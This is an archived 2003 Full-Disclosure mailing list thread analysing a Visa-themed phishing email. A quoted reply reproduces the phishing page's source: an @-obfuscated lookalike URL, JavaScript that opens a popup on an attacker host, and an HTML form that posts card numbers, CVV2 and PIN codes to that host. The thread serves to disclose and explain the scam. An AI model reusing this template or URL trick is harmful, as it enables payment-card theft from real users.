lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: joshua.knarr at sap.com (Knarr, Joshua)
Subject: visa XSS?

My bad, it was just pointed out to me that redirection between @ and %01@ are different things.  I don't mean to take shots at the Xforce guys.

Thanks guys.

>-----Original Message-----
>From: full-disclosure-admin@...ts.netsys.com 
>[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Gary Flynn
>Sent: Tuesday, December 23, 2003 9:30 AM
>To: Mauro Flores
>Cc: full-disclosure@...ts.netsys.com
>Subject: Re: [Full-Disclosure] visa XSS?
>
>
>
>Mauro Flores wrote:
>
>> I receive this mail today, the funny stuff is that when you 
>click on the
>> link, you execute:
>> 
>http://www.visa.com:UserSession=2f6q9uuu88312264trzzz55884495&u
seroption=SecurityUpdate&StateLevel=GetFrom@...21.80.2/~gotier/verified_by_visa.htm
>> 
>> I don't have a Visa card and I don't like that 64.21.80.2 
>which is not a
>> Visa IP, AFAIK.
>> Anyone else receive it??
>
>Yeah. We just got one here. I missed the first part of this thread
>so I don't know if I'm repeating stuff.
>
>The original email came from an address registered in Korea.
>
>Although the present web site redirects to the VISA site, if 
>you look at
>the source you'll find:
>
><HTML><HEAD>
><TITLE>Secure with Visa</TITLE>
><META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
><meta http-equiv='refresh' content='0; 
>url=http://www.usa.visa.com/personal/privacy_policy/?it=ft_/per
sonal/secure_with_visa/index.html'>
><BODY>
>	<script language="JavaScript">
><!--
>
>
>//	alert("popali");
>	window.name="spec";
>	window.open("http://64.21.80.2/~gotier/r.php", 'Visa', 
>"resizable=no,scrollbars=no,width=425,height=198");	
>//	window.focus();
>//-->
></script>
></BODY></HTML>
>
>And that r.php is a phish:
>
>Please, enter your data info!<html>
><head>
><title>Enter your data</title>
></head>
><body>
><br>
><form method=post action=http://64.21.80.2/~gotier/r.php>
>Credit Card No. <input type=text name=cc value=''><br>
>CVV2 <input type=text name=cvv2 value=''><br>
>PIN-ATM CODE: <input type=text name=pin value=''><br>
>Expiration Date: month : <select name=month>
><option value=01>01
><option value=02>02
><option value=03>03
><option value=04>04
><option value=05>05
><option value=06>06
><option value=07>07
><option value=08>08
><option value=09>09
><option value=10>10
><option value=11>11
><option value=12>12
></select> year : <select name=year>
><option value=2003>2003
><option value=2004>2004
><option value=2005>2005
><option value=2006>2006
><option value=2007>2007
><option value=2008>2008
><option value=2009>2009
><option value=2010>2010
><option value=2011>2011
><option value=2012>2012
></select>
><br><br>
><input type=submit value='Send');
></form>
></body>
></html>
>
>-- 
>Gary Flynn
>Security Engineer - Technical Services
>James Madison University
>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ